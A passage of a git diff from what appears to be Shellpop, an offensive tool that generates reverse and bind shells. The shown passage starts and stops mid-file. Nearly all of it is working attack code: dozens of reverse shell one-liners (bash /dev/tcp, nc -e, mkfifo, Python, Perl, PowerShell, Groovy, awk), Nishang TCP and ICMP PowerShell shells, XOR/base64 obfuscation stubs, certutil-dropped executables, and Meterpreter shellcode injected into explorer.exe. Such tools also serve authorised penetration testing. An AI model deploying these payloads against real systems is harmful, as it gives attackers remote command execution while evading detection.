udp-listen:PORT exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &" + + +def BIND_POWERSHELL_NISHANG_TCP(): + return """function Invoke-PowerShellTcp +{ + [CmdletBinding(DefaultParameterSetName="reverse")] Param( + + [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] + [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] + [String] + $IPAddress, + + [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] + [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] + [Int] + $Port, + + [Parameter(ParameterSetName="reverse")] + [Switch] + $Reverse, + + [Parameter(ParameterSetName="bind")] + [Switch] + $Bind + + ) + + + try + { + #Connect back if the reverse switch is used. + if ($Reverse) + { + $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) + } + + #Bind to the provided port if Bind switch is used. + if ($Bind) + { + $listener = [System.Net.Sockets.TcpListener]$Port + $listener.start() + $client = $listener.AcceptTcpClient() + } + + $stream = $client.GetStream() + [byte[]]$bytes = 0..65535|%{0} + + #Send back current username and computername + $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") + $stream.Write($sendbytes,0,$sendbytes.Length) + + #Show an interactive PowerShell prompt + $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') + $stream.Write($sendbytes,0,$sendbytes.Length) + + while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) + { + $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding + $data = $EncodedText.GetString($bytes,0, $i) + try + { + #Execute the command on the target. + $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) + } + catch + { + Write-Warning "Something went wrong with execution of command on the target." + Write-Error $_ + } + $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' + $x = ($error[0] | Out-String) + $error.clear() + $sendback2 = $sendback2 + $x + + #Return the results + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) + $stream.Write($sendbyte,0,$sendbyte.Length) + $stream.Flush() + } + $client.Close() + if ($listener) + { + $listener.Stop() + } + } + catch + { + Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." + Write-Error $_ + } +} +Invoke-PowerShellTcp -Bind -Port PORT""" diff --git a/src/classes.py b/src/classes.py index c2001f3..78c843c 100644 --- a/src/classes.py +++ b/src/classes.py @@ -1,11 +1,12 @@ from encoders import powershell_base64, xor, to_unicode, to_urlencode from binascii import hexlify -from binary import shellcode_to_ps1, WINDOWS_BLOODSEEKER_SCRIPT # imported since 0.3.6 +from binary import shellcode_to_hex, shellcode_to_ps1, WINDOWS_BLOODSEEKER_SCRIPT # imported since 0.3.6 from sys import exit import platform import os import string + def generate_file_name(extension=""): file_name = "" while len(file_name) < 8: @@ -14,13 +15,15 @@ def generate_file_name(extension=""): file_name += random_char return file_name + extension + class OperationalSystem(object): def __init__(self): self.OS = "linux" if "linux" in platform.platform().lower() else "windows" + SysOS = OperationalSystem() -# These functions are widely used across the source-code. + def info(msg): if SysOS.OS == "linux": msg = "[\033[094m+\033[0m] {0}".format(msg) @@ -28,6 +31,7 @@ def info(msg): msg = "[+] {0}".format(msg) return msg + def error(msg): if SysOS.OS == "linux": msg = "[\033[091m!\033[0m] {0}".format(msg) @@ -35,13 +39,14 @@ def error(msg): msg = "[!] {0}".format(msg) return msg + def alert(msg): if SysOS.OS == "linux": msg = "[\033[093mALERT\033[0m] {0}".format(msg) else: msg = "[ALERT] {0}".format(msg) return msg -#================= + def random_case_shuffle(data): """ @@ -53,6 +58,7 @@ def random_case_shuffle(data): out += char.upper() if ord(os.urandom(1)) % 2 == 0 else char.lower() return out + def powershell_wrapper(name, code, args): """ --powershell-x86 and --powershell-x64 @@ -72,9 +78,10 @@ def powershell_wrapper(name, code, args): code = code.replace("powershell.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") if "powershell" in name.lower() and args.powershell_random_case is True: - code = random_case_shuffle(code) # apply random case if user requested. + code = random_case_shuffle(code) # apply random case if user requested. return code + def xor_wrapper(name, code, args, shell="/bin/bash"): if args.shell is not "": shell = args.shell @@ -92,14 +99,15 @@ def xor_wrapper(name, code, args, shell="/bin/bash"): pcode = xcode.replace('"', "") #pcode = pcode.replace("\\", '\\"') - code = to_unicode(pcode) # String to Unicode - code = xor(code, args.xor) # XOR encode using random key <-- + code = to_unicode(pcode) # String to Unicode + code = xor(code, args.xor) # XOR encode using random key <-- code = powershell_base64(code, unicode_encoding=False) # We need it in base64 because it is binary code = """ $k={0};$b='{1}';$d=[Convert]::FromBase64String($b);$dd=foreach($byte in $d) {{$byte -bxor $k}};$dm=[System.Text.Encoding]::Unicode.GetString($dd);iex $dm""".format(args.xor, code) # Decryption stub - code= prefix + "-Command " + '"%s"' % code + code = prefix + "-Command " + '"%s"' % code return code -def base64_wrapper(name, code, args,shell="/bin/bash"): + +def base64_wrapper(name, code, args, shell="/bin/bash"): if args.shell is not "": shell = args.shell if args.base64 is True: @@ -162,7 +170,7 @@ def __init__(self, name, args, code): self.host = args.host self.port = args.port self.code = code - self.payload = str() # this is where the final code is stored. + self.payload = str() # this is where the final code is stored. def get(self): """ @@ -180,18 +188,28 @@ def get(self): self.code = powershell_wrapper(self.name, self.code, self.args) else: # Custom shell. Here we need to program individually based in specifics. - if "bloodseeker" in self.name.lower(): # This is for Bloodseeker project. + # TODO: I need to separate this into a custom file. + + if "bat2meterpreter" in self.name.lower(): + print(info("Generating shellcode ...")) + return self.code + shellcode_to_hex("windows/meterpreter/reverse_tcp", self.args.host, self.args.port) + + if "bloodseeker" in self.name.lower(): # This is for Bloodseeker project. # This one requires a stager. if self.args.stager is None: print(error("This payload REQUIRES --stager flag.")) exit(1) - + print(info("Generating shellcode ...")) malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace("SHELLCODEHERE", shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp", self.args.host, self.args.port)) - self.code = malicious_script.replace("PROCESSNAME", "explorer") # we want inject into explorer.exe - print(alert("Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.")) - return self.code # we dont need encoder in this one. + + # TODO: Create a --bloodseeker-process flag to specify process name + process_name = "explorer" + self.code = malicious_script.replace("PROCESSNAME", process_name) + print(alert("Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening \ + in your machine.")) + return self.code # we don't need encoder in this one. else: print(error("No custom shell procedure was arranged for this shell. This is fatal.")) exit(1) @@ -208,6 +226,7 @@ def get(self): return self.code + class BindShell(object): def __init__(self, name, args, code): self.name = name diff --git a/src/encoders.py b/src/encoders.py index 45ecb0f..715806b 100644 --- a/src/encoders.py +++ b/src/encoders.py @@ -1,6 +1,7 @@ from urllib import quote from binascii import hexlify + def to_urlencode(data): """ URL-encode a byte stream, plus some other characters that @@ -13,6 +14,7 @@ def to_urlencode(data): data = data.replace(each, "%" + hexlify(each)) return data + def to_unicode(data): """ Get a string and make it Unicode @@ -23,6 +25,7 @@ def to_unicode(data): out += char + "\x00" return out + def powershell_base64(data, unicode_encoding=True): """ Encode something compatible for Powershell base64-encoding @@ -32,6 +35,7 @@ def powershell_base64(data, unicode_encoding=True): data = to_unicode(data) if unicode_encoding is True else data return data.encode("base64").replace("\n", "") + def xor(data, key): """ XOR a byte-stream with a single key value (int) diff --git a/src/handlers.py b/src/handlers.py index d46f143..009da40 100644 --- a/src/handlers.py +++ b/src/handlers.py @@ -1,19 +1,18 @@ #!/usr/bin/env python2 -# PTY, TCP_PTY_Handler classes were extracted from this URL -# https://github.com/infodox/python-pty-shells/blob/master/pty_shell_handler.py -# This is not officialy code from Shellpop project. - -# The other classes, are. +# Full stager remake. Now I am going to lead a major change in this functionality. +# I am going to lendo multi/handler module of Metasploit Framework to do this job. +# This is going to be done mostly because of meterpreter upgrade possibility. from shellpop import * -from threading import Thread from time import sleep import termios import select import socket import os import fcntl -import sys +import string +import random +from os import path, system class PTY: def __init__(self, slave=0, pid=os.getpid()): @@ -25,7 +24,7 @@ def __init__(self, slave=0, pid=os.getpid()): self.pty = open(os.readlink("/proc/%d/fd/%d" % (pid, slave)), "rb+") # store our old termios settings so we can restore after - # we are finished + # we are finished self.oldtermios = termios.tcgetattr(self.pty) # get the current settings se we can modify them @@ -65,6 +64,7 @@ def __del__(self): self.termios.tcsetattr(self.pty, self.termios.TCSAFLUSH, self.oldtermios) self.fcntl.fcntl(self.pty, self.fcntl.F_SETFL, self.oldflags) + class TCP_PTY_Handler(object): def __init__(self, addr, bind=True): self.bind = bind @@ -85,7 +85,7 @@ def handle(self, addr=None): sock = socket.socket() print(info("Waiting up to 10 seconds to start establishing the connection ...")) sleep(10) - + print(info("Connecting to remote endpoint ...")) n = 0 while n < 10: @@ -146,88 +146,123 @@ def buffer_index(fd): # close the socket sock.close() -class TCP_Handler(object): + +def error(err): + return "[\033[091m!\033[0m] Error: {0}".format(err) + + +def random_file(n=10): """ - TCP handler class to get our shells! - @zc00l + Generates a random rc file in /tmp/folder. """ - def __init__(self, conn_info, bind=True): - self.conn_info = conn_info - self.bind = bind - self.sock = None - - @staticmethod - def read_and_loop(sock): - while True: - try: - data = sock.recv(1024) - if data and len(data) > 0: - sys.stdout.write(data) - except socket.timeout: - sleep(1) - except KeyboardInterrupt: - sock.close() - return 0 - except socket.error: - sock.close() - return 0 - - def handle(self): - sock = None - self.sock = socket.socket() - if self.bind is True: - self.sock.bind(self.conn_info) - self.sock.listen(5) - - sock, addr = self.sock.accept() - print(info("Connection inbound from {0}:{1}".format(addr[0], addr[1]))) - else: # reverse shell. - print(info("Waiting up to 10 seconds to start establishing the connection ...")) - sleep(10) - - print(info("Connecting to remote endpoint ...")) - n = 0 - while n < 10: - try: - self.sock.connect(self.conn_info) - sock = self.sock - print(info("Connection to remote endpoint established.")) - break - except socket.error: - print(error("Connection to remote endpoint could not be established.")) - n+=1 - sleep(4.5) - - if sock is None: # we assume we have a connection by now. - print(error("No connection socket to use.")) - exit(0) + file_name = str() + while len(file_name) < n: + chosen = list(string.letters)[random.randint(1, len(string.letters))-1] + file_name += chosen + return "/tmp/" + file_name + ".rc" + + +class MetaHandler(object): + def __init__(self): + self.host = None + self.port = None + self.shell = None + self.payload = None + + def check_system(self, is_bind=False): + if self.shell.lower() == "cmd": + if is_bind is False: + self.payload = "windows/shell_reverse_tcp" + else: + self.payload = "windows/shell_bind_tcp" + return + elif self.shell.lower() == "powershell": + if is_bind is False: + self.payload = "windows/shell_reverse_tcp" + else: + self.payload = "windows/shell_bind_tcp" + return + elif self.shell.lower() == "bash": + if is_bind is False: + self.payload = "linux/x86/shell_reverse_tcp" + else: + self.payload = "linux/x86/shell_bind_tcp" + return + self.payload = "generic/shell_reverse_tcp" + + +class Generic(MetaHandler): + def __init__(self, conn, shell, is_bind=False): + self.file_name = random_file() + self.host = conn[0] + self.port = conn[1] + self.shell = shell + self.check_system(is_bind=is_bind) # sets self.payload + + def generate_rc_content(self, meterpreter=False): + """ + Generate a rc content to be used in metasploit. + """ + + # This sets the basic information to our handler module. + base_rc = "set SessionLogging true\nset TimestampOutput true\nset VERBOSE true\n use exploit/multi/handler\nset PAYLOAD {0}\nset LHOST {1}\nset LPORT {2}\n".format(self.payload, self.host, self.port) + + # This is not yet implemented. + #if meterpreter is True: # Haha! Lets upgrade this! + # base_rc += "set AutoRunScript post/multi/manage/shell_to_meterpreter\n" + + # After everything is set, we need to finish it with "run" + base_rc += "run\n" + + return base_rc + + def _generate_execution_string(self): + return "msfconsole -q -r {0}".format(self.file_name) + + def generate_and_execute(self, meterpreter=False): + if path.exists(self.file_name): + print(error("File already exists! Aborting :(")) + return None + with open(self.file_name, "wb") as f: + f.write(self.generate_rc_content(meterpreter=meterpreter)) + + # Execute our .rc file to open metasploit handler. + system("""xterm -fn "-misc-fixed-medium-r-normal--18-*-*-*-*-*-iso8859-15" +sb -geometry 100x25+0+0 -e """ + self._generate_execution_string()) + + +def get_shell_name(shell_obj): + """ + This ridiculously simple function is enough to determine + the receiving shell type for meterpreter upgrade. + """ + if shell_obj.system_os == "linux": + return "bash" + if shell_obj.system_os == "windows": + if "powershell" in shell_obj.short_name: + return "powershell" else: - sock.settimeout(1.0) - - t = Thread(target=self.read_and_loop, args=(sock,)) - t.start() # start the read in loop. - while 1: - try: - s = raw_input("") # This is a block call. - sock.send(s+"\n") - except KeyboardInterrupt: - print(info("Interrupting handler ...")) - sock.close() - self.sock.close() - t.join() - -def reverse_tcp_handler(conn_info): - handler = TCP_Handler(conn_info, bind=True) - handler.handle() + return "cmd" -def bind_tcp_handler(conn_info): - handler = TCP_Handler(conn_info, bind=False) - handler.handle() -def reverse_tcp_pty_handler(conn_info): - handler = TCP_PTY_Handler(conn_info, bind=True) +def reverse_tcp_handler((args, shell)): + shell_name = get_shell_name(shell) + handler = Generic((args.host, args.port), shell_name, is_bind=False) + handler.generate_and_execute() + + +def bind_tcp_handler((args, shell)): + shell_name = get_shell_name(shell) + handler = Generic((args.host, args.port), shell_name, is_bind=True) + handler.generate_and_execute() + + +# I am keeping these handlers because of @Lowfuel + +def bind_tcp_pty_handler((args, shell)): + handler = TCP_PTY_Handler((args.host, args.port), bind=False) handler.handle() -def bind_tcp_pty_handler(conn_info): - handler = TCP_PTY_Handler(conn_info, bind=False) - handler.handle() \ No newline at end of file + +def reverse_tcp_pty_handler((args, shell)): + handler = TCP_PTY_Handler((args.host, args.port), bind=True) + handler.handle() diff --git a/src/reverse.py b/src/reverse.py index c38e984..0e81767 100644 --- a/src/reverse.py +++ b/src/reverse.py @@ -1,73 +1,267 @@ #!/usr/bin/env python -from binary import WINDOWS_NCAT, binary_to_bat, shellcode_to_ps1 +from binary import WINDOWS_NCAT, WINDOWS_SHARPCODE, binary_to_bat, shellcode_to_ps1 from classes import generate_file_name + def REV_PYTHON_TCP(): - return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """ + return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """ + def REV_PYTHON_UDP(): - return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """ + return """python -c \"import os; import pty; import socket; lhost = 'TARGET'; lport = PORT; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();\" """ + def REV_PHP_TCP(): - return r"""php -r "\$sock=fsockopen('TARGET',PORT);exec('/bin/sh -i <&3 >&3 2>&3');" """ + return r"""php -r "\$sock=fsockopen('TARGET',PORT);exec('/bin/sh -i <&3 >&3 2>&3');" """ + def REV_RUBY_TCP(): - return """ruby -rsocket -e "exit if fork;c=TCPSocket.new('TARGET','PORT');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end" """ + return """ruby -rsocket -e "exit if fork;c=TCPSocket.new('TARGET','PORT');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end" """ + def REV_PERL_TCP(): - return r"""perl -e "use Socket;\$i='TARGET';\$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" """ + return r"""perl -e "use Socket;\$i='TARGET';\$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};" """ + def REV_PERL_TCP_2(): - return r"""perl -MIO -e "\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,'TARGET:PORT');STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;" """ + return r"""perl -MIO -e "\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,'TARGET:PORT');STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;" """ + def REV_PERL_UDP(): - return """perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);my ($pa,$pp);$s=new IO::Socket::INET->new();$s = new IO::Socket::INET(PeerAddr => "TARGET:PORT",Proto => "udp"); $s->send("SHELLPOP PWNED!\n");while(1) { $s->recv($r,1024);$pa=$s->peerhost();$pp=$s->peerport();$d=qx($r);$s->send($d);}'""" + return """perl -e 'use IO::Socket::INET;$|=1;my ($s,$r);my ($pa,$pp);$s=new IO::Socket::INET->new();$s = new IO::Socket::INET(PeerAddr => "TARGET:PORT",Proto => "udp"); $s->send("SHELLPOP PWNED!\n");while(1) { $s->recv($r,1024);$pa=$s->peerhost();$pp=$s->peerport();$d=qx($r);$s->send($d);}'""" + def BASH_TCP(): - return """/bin/bash -i >& /dev/tcp/TARGET/PORT 0>&1""" + return """/bin/bash -i >& /dev/tcp/TARGET/PORT 0>&1""" + def REV_POWERSHELL_TCP(): - return """powershell.exe -nop -ep bypass -Command "$ip='TARGET';$port=PORT;$client = New-Object System.Net.Sockets.TCPClient($ip, $port);$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ');$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -c $returndata 2>&1 | Out-String ) } catch { Write-Warning 'Something went wrong with execution of command on the target.'; Write-Error $_; }; $sendback = $result + 'PS ' + (Get-Location).Path + '> '; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };" """ + return """powershell.exe -nop -ep bypass -Command "$ip='TARGET';$port=PORT;$client = New-Object System.Net.Sockets.TCPClient($ip, $port);$stream=$client.GetStream();[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ');$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $returndata = ([text.encoding]::ASCII).GetString($bytes, 0, $i); try { $result = (Invoke-Expression -c $returndata 2>&1 | Out-String ) } catch { Write-Warning 'Something went wrong with execution of command on the target.'; Write-Error $_; }; $sendback = $result + 'PS ' + (Get-Location).Path + '> '; $x = ($error[0] | Out-String); $error.clear(); $sendback = $sendback + $x; $sendbytes = ([text.encoding]::ASCII).GetBytes($sendback); $stream.Write($sendbytes, 0, $sendbytes.Length); $stream.Flush();}; $client.Close(); if ($listener) { $listener.Stop(); };" """ + def REVERSE_TCLSH(): - return """echo 'set s [socket TARGET PORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh""" + return """echo 'set s [socket TARGET PORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh""" + def REVERSE_NCAT(): - return "ncat TARGET PORT -e /bin/bash" + return "ncat TARGET PORT -e /bin/bash" + def REVERSE_NC_TRADITIONAL_1(): - return "nc TARGET PORT -c /bin/bash" + return "nc TARGET PORT -c /bin/bash" + def REVERSE_NC_UDP_1(): - return """mkfifo fifo ; nc.traditional -u TARGET PORT < fifo | { bash -i; } > fifo""" + return """mkfifo fifo ; nc.traditional -u TARGET PORT < fifo | { bash -i; } > fifo""" + def REVERSE_MKFIFO_NC(): - return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TARGET PORT > /tmp/f" + return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc TARGET PORT > /tmp/f" + def REVERSE_MKNOD_NC(): - return "if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc TARGET PORT 0/tmp/f" + return "if [ -e /tmp/f ]; then rm -f /tmp/f;fi;mknod /tmp/f p && nc TARGET PORT 0/tmp/f" + def REVERSE_MKFIFO_TELNET(): - return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet TARGET PORT > /tmp/f" + return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet TARGET PORT > /tmp/f" + def REVERSE_MKNOD_TELNET(): - return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mknod /tmp/f p && telnet TARGET PORT 0/tmp/f" + return "if [ -e /tmp/f ]; then rm /tmp/f;fi;mknod /tmp/f p && telnet TARGET PORT 0/tmp/f" + def REVERSE_SOCAT(): - return """socat tcp-connect:TARGET:PORT exec:"bash -li",pty,stderr,setsid,sigint,sane""" + return """socat tcp-connect:TARGET:PORT exec:"bash -li",pty,stderr,setsid,sigint,sane""" + def REVERSE_AWK(): - return """awk 'BEGIN {s = "/inet/tcp/0/TARGET/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null""" + return """awk 'BEGIN {s = "/inet/tcp/0/TARGET/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null""" + def REVERSE_AWK_UDP(): return """awk 'BEGIN {s = "/inet/udp/0/TARGET/PORT"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null""" + +def REVERSE_WINDOWS_BAT2METERPRETER_TCP(): + file_out = generate_file_name() + return """{0}\ncertutil -decode %Temp%\\{1}.b64 %Temp%\\{1}.exe\n%Temp%\\{1}.exe """.format( + binary_to_bat(WINDOWS_SHARPCODE, file="%Temp%\\{0}.b64".format(file_out)), file_out) + + def REVERSE_WINDOWS_NCAT_TCP(): - nc_out = generate_file_name() - return """{0}\ncertutil -decode %Temp%\\{1}.b64 %Temp%\\{1}.exe\n%Temp%\\{1}.exe -e cmd.exe TARGET PORT\ndel %Temp%\\{1}.exe\n""".format(binary_to_bat(WINDOWS_NCAT, file="%Temp%\\{0}.b64".format(nc_out)), nc_out) + nc_out = generate_file_name() + return """{0}\ncertutil -decode %Temp%\\{1}.b64 %Temp%\\{1}.exe\n%Temp%\\{1}.exe -e cmd.exe TARGET PORT\ndel %Temp%\\{1}.exe\n""".format( + binary_to_bat(WINDOWS_NCAT, file="%Temp%\\{0}.b64".format(nc_out)), nc_out) + def REVERSE_WINDOWS_BLOODSEEKER_TCP(): - return """ Custom Shell requires a Custom code. """ + return """ Custom Shell requires a Custom code. """ + def REVERSE_POWERSHELL_TINY_TCP(): - return """powershell.exe -nop -ep bypass -Command "$c=new-object system.net.sockets.tcpclient('TARGET',PORT);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'PS' + (pwd).Path + '>';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()" """ \ No newline at end of file + return """powershell.exe -nop -ep bypass -Command "$c=new-object system.net.sockets.tcpclient('TARGET',PORT);$s=$c.GetStream();[byte[]]$b = 0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$o=(iex $d 2>&1|out-string);$z=$o + 'PS' + (pwd).Path + '>';$x = ([text.encoding]::ASCII).GetBytes($z);$s.Write($x,0,$x.Length);$s.Flush};$c.close()" """ + + +def REVERSE_POWERSHELL_NISHANG_TCP(): + return """function Invoke-PowerShellTcp +{ + [CmdletBinding(DefaultParameterSetName="reverse")] Param( + + [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")] + [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")] + [String] + $IPAddress, + + [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")] + [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")] + [Int] + $Port, + + [Parameter(ParameterSetName="reverse")] + [Switch] + $Reverse, + + [Parameter(ParameterSetName="bind")] + [Switch] + $Bind + + ) + + + try + { + #Connect back if the reverse switch is used. + if ($Reverse) + { + $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port) + } + + #Bind to the provided port if Bind switch is used. + if ($Bind) + { + $listener = [System.Net.Sockets.TcpListener]$Port + $listener.start() + $client = $listener.AcceptTcpClient() + } + + $stream = $client.GetStream() + [byte[]]$bytes = 0..65535|%{0} + + #Send back current username and computername + $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") + $stream.Write($sendbytes,0,$sendbytes.Length) + + #Show an interactive PowerShell prompt + $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>') + $stream.Write($sendbytes,0,$sendbytes.Length) + + while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) + { + $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding + $data = $EncodedText.GetString($bytes,0, $i) + try + { + #Execute the command on the target. + $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String ) + } + catch + { + Write-Warning "Something went wrong with execution of command on the target." + Write-Error $_ + } + $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ' + $x = ($error[0] | Out-String) + $error.clear() + $sendback2 = $sendback2 + $x + + #Return the results + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) + $stream.Write($sendbyte,0,$sendbyte.Length) + $stream.Flush() + } + $client.Close() + if ($listener) + { + $listener.Stop() + } + } + catch + { + Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." + Write-Error $_ + } +} +Invoke-PowerShellTcp -Reverse -IPAddress TARGET -Port PORT""" + + +def REVERSE_GROOVY_TCP(): + return """groovysh -e 'String host="TARGET";int port=PORT;String cmd="cmd.exe";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();'""" + + +def REVERSE_POWERSHELL_ICMP(): + return """function Invoke-PowerShellIcmp +{ +<#PORT#> + [CmdletBinding()] Param( + + [Parameter(Position = 0, Mandatory = $true)] + [String] + $IPAddress, + + [Parameter(Position = 1, Mandatory = $false)] + [Int] + $Delay = 5, + + [Parameter(Position = 2, Mandatory = $false)] + [Int] + $BufferSize = 128 + + ) + $ICMPClient = New-Object System.Net.NetworkInformation.Ping + $PingOptions = New-Object System.Net.NetworkInformation.PingOptions + $PingOptions.DontFragment = $True + $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n") + $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null + $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ') + $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null + while ($true) + { + $sendbytes = ([text.encoding]::ASCII).GetBytes('') + $reply = $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) + if ($reply.Buffer) + { + $response = ([text.encoding]::ASCII).GetString($reply.Buffer) + $result = (Invoke-Expression -Command $response 2>&1 | Out-String ) + $sendbytes = ([text.encoding]::ASCII).GetBytes($result) + $index = [math]::floor($sendbytes.length/$BufferSize) + $i = 0 + if ($sendbytes.length -gt $BufferSize) + { + while ($i -lt $index ) + { + $sendbytes2 = $sendbytes[($i*$BufferSize)..(($i+1)*$BufferSize)] + $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null + $i +=1 + } + $remainingindex = $sendbytes.Length % 